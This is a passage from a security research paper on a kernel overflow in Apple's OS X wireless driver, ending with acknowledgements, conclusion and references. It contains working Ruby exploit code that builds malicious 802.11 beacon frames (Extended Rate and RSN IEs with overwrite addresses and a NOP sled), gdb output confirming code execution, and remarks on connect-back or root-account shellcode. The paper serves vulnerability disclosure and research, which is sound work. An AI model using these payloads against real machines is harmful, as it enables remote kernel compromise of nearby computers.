As can be seen above, the kernel attempted to execute an instruction at the invalid address 0x61413761. This address was provided in the generated packet. While this does not show actual code execution, it does prove that code execution is possible. An attacker can overwrite every member of that structure with the address of arbitrary memory that the attacker controls. Since the IE length has to match the byte stored at sta_default+1, the buffer needs to be 0xe0 bytes in length. This means that since sta_default is 64 bytes, one writes more than is needed. Immediately after sta_default in memory is a structure called chanflags, which is also at a predictable address. To execute code of an attacker's choosing, the remainder of the RSN IE buffer can be packed with NOPs that end with 0xcc 0xcc 0xcc 0xcc, which will cause a trap to the debugger, making it possible to examine the state and verify that code actually executed. (0xcc is the machine code for the int 3 assembly instruction, which causes a processor interrupt that a debugger can safely catch.) This is an important step, as OS X claims to have NX protection that would prohibit certain memory regions from executing code. Executing a NOP sled followed by 0xcc will prove that protection technologies like NX do not affect execution in this situation.
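
The layout constraints described above can be checked offline with a standalone Ruby sketch. It is an illustration under stated assumptions, not the author's module. It avoids the Rex library, takes the two offsets from the exploit scripts in this paper, and assumes the load address 0x8e7000 implied by the gdb sessions. The names build_rsn_ie and landing_address are made up for this example.

```ruby
STA_DEFAULT_OFF = 0x4aee0  # offset of sta_default inside the kext (from make_xrate)
PAYLOAD_OFF     = 0x4af20  # offset at which the NOP sled lands (from make_rsn)

# Build an RSN IE: 2 bytes of padding, 15 copies of the payload address,
# then 162 bytes of NOPs with four int3 bytes placed 10 bytes in.
def build_rsn_ie(kext_base)
  pad      = "\x00\x00".b
  pointers = [kext_base + PAYLOAD_OFF].pack('V') * 15
  code     = "\x90".b * 162
  code[10, 4] = "\xcc\xcc\xcc\xcc".b
  body = pad + pointers + code
  "\x30".b + [body.bytesize].pack('C') + body
end

# ieee80211_saveie copies the whole IE, header included, to the destination,
# so byte i of the IE lands at sta_default + i.
def landing_address(kext_base, ie_index)
  kext_base + STA_DEFAULT_OFF + ie_index
end

kext_base = 0x8e7000  # assumed load address, implied by the gdb sessions
ie = build_rsn_ie(kext_base)

puts format('IE length byte:   0x%02x', ie.getbyte(1))
puts format('NOP sled starts:  0x%x', landing_address(kext_base, 2 + 2 + 15 * 4))
puts format('first int3 lands: 0x%x', landing_address(kext_base, ie.index("\xcc".b)))
```

The length byte comes out as 0xe0, the same value as the second byte of the first word of sta_default (0x0092e050) in the dump above, which is the condition that lets ieee80211_saveie skip the allocation. Under the assumed load address the sled begins at 0x931f20, where the dump shows the data following sta_default.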

The following Ruby code shows how the packet described above can be generated:

    ssid = Rex::Text.rand_text_alphanumeric(rand(255))
    bssid = "\x61\x61\x61" + Rex::Text.rand_text(3)
    seq = [rand(255)].pack('n')
    xrate = make_xrate()
    rsn = make_rsn()

    frame =
      "\x80" +                      # type/subtype: beacon
      "\x00" +                      # flags
      "\x00\x00" +                  # duration
      "\xff\xff\xff\xff\xff\xff" +  # destination (broadcast)
      bssid +                       # source
      bssid +                       # BSSID
      seq +                         # sequence control
      Rex::Text.rand_text(8) +      # timestamp
      "\xff\xff" +                  # beacon interval
      Rex::Text.rand_text(2) +      # capability flags
      #ssid tag
      "\x00" + ssid.length.chr + ssid +
      #supported rates
      "\x01" + "\x08" + "\x82\x84\x8b\x96\x0c\x18\x30\x48" +
      #current channel
      "\x03" + "\x01" + channel.chr +
      #Xrate
      xrate +
      #RSN
      rsn

    def make_xrate
      #calculate the offset that RSN needs to overwrite
      staRsnOff = 0x4aee0
      kextAddr = datastore['KEXT_OFF'].to_i
      staStruct = kextAddr + staRsnOff

      #build the xrate_frame
      xrate_build = Rex::Text.pattern_create(240) #base of IE

      #crashes often occur in the following locations so they are blanked
      xrate_build[67, 2]="\x00\x00"
      xrate_build[71, 4]="\x00\x00\x00\x00"
      xrate_build[79, 4]="\x00\x00\x00\x00"

      #Overwrite address for RSN element
      xrate_build[55, 4]=[staStruct].pack('V')

      xrate_frame = "\x32" + xrate_build.length.chr + xrate_build
      return xrate_frame
    end

    def make_rsn
      #calculate the address to overwrite the sta_default
      rsnTargetOff = 0x4af20
      kextAddr = datastore['KEXT_OFF'].to_i
      rsnOvrAddr = kextAddr + rsnTargetOff

      #need two bytes for alignment
      rsn_pad = "\x00\x00"

      #copy the address of the payload over every element in sta_default
      rsnAddrTmp=[rsnOvrAddr].pack('V')
      rsn_overwrite_addr = (rsnAddrTmp * 15)

      rsn_code_size = 162
      rsn_code = ("\x90" * rsn_code_size)
      rsn_code[10, 4]="\xcc\xcc\xcc\xcc"

      rsn_build = rsn_pad + rsn_overwrite_addr + rsn_code
      rsn_frame = "\x30" + rsn_build.length.chr + rsn_build
      return rsn_frame
    end

After firing off this packet, the debugger breaks on a breakpoint trap:

    (gdb) c
    Continuing.

    Program received signal SIGTRAP, Trace/breakpoint trap.
    0x00931f2b in chanflags ()
    2: x/i $eip 0x931f2b : int3
    (gdb) info registers
    eax 0x931ee0 9641696
    ecx 0x431bde83 1125899907
    edx 0x0 0
    ebx 0x31cf9 204025
    esp 0xc863ed8 0xc863ed8
    ebp 0xc863f64 0xc863f64
    esi 0x380346c 58733676
    edi 0x3801004 58724356
    eip 0x931f2b 0x931f2b
    eflags 0x246 582
    cs 0x8 8
    ss 0x10 16
    ds 0x10 16
    es 0xa4810010 -1535049712
    fs 0x10 16
    gs 0x12260048 304480328
    (gdb) x/i $eip
    0x931f2b : int3
    (gdb) x/i $eip-1
    0x931f2a : int3
    (gdb) x/i $eip-2
    0x931f29 : nop
    (gdb)

The previous instruction was an int 3, and the one before that was a NOP. This proves that the code execution test was successful. As it stands, one needs 64 bytes to overwrite sta_default and the RSN buffer has to be 0xe0 (224) bytes long, which leaves 160 bytes for first-stage shellcode. This is more than enough to locate and execute a second stage.

In other words, the Apple driver will copy five IEs from the original packet. One can cause an overflow in one of these elements, the Extended Rate IE, to overwrite structures that determine how the remaining four elements are copied. The copy of the RSN IE is chosen to make it possible to overwrite function pointers and store a first-stage shellcode. The remaining three IEs, roughly 765 bytes in total, can be used to contain the real shellcode that does something useful, such as opening a connect-back shell, adding a root user account, or playing fun sounds on the speaker.

7) Acknowledgements

The author would like to thank a few different people for the massive amount of help. Jon Ellch taught me how to do wireless injection and driver auditing. His wife explained public key cryptography to me (``You see, it's really just a complex math problem with REALLY big numbers''). Josh Wright and Mike Kershaw wrote and released LORCON, which is the basis for everything I have done. Rob Graham is awesome. HD Moore, Matt Miller, and the Metasploit project provide a simple-to-use, extensible exploit framework that can bring things like driver vulnerabilities to the masses. Porting this exploit to Metasploit was pretty much a snap. Almost all of the Metasploit examples for the Atheros overflow were derived from HD Moore's fuzzbeacon.rb script. Rich Mogull provided edits and advice.

8) Conclusion

This paper has given a quick walk-through of a real vulnerability in Apple's wireless driver in terms of discovery and exploitation. Getting code execution is only one part of an exploit. To do something useful, an attacker needs kernel-mode shellcode. That subject will be covered in a future paper.

The exploit discussed in this paper is just a proof-of-concept since, as it stands now, one needs to know the load address of the kernel module on the target machine. This is a choice, not a restriction. This method of gaining execution is well suited to a proof-of-concept. Creation of a weaponized exploit that can execute arbitrary code with no prior knowledge is just as easy. It is just a matter of overwriting different parts of the kernel. If the reader is interested in OS X kernel shellcode design, be sure to review the example scripts that contain different payloads that could be packed into the RSN IE and other optional elements.

References

[1] Apple, Inc. The Universal File Format. http://developer.apple.com/documentation/DeveloperTools/Conceptual/MachORuntime/Reference/reference.html#//apple_ref/doc/uid/20001298-154889

[2] Apple, Inc. Lipo man page. http://developer.apple.com/documentation/Darwin/Reference/ManPages/man1/lipo.1.html

[3] Apple, Inc. Setting up OS X live kernel Debugging. http://developer.apple.com/documentation/Darwin/Conceptual/KEXTConcept/KEXTConceptDebugger/hello_debugger.html

[4] Wikipedia. Graphical OS Kernel Panic. http://en.wikipedia.org/wiki/Image:MacOS X_kernel_panic.png

[5] BackTrack. BackTrack 2. http://www.remote-exploit.org/backtrack.html

[6] Wikipedia. LORCON. http://en.wikipedia.org/wiki/Lorcon

[7] Metasploit. Metasploit. http://www.metasploit.com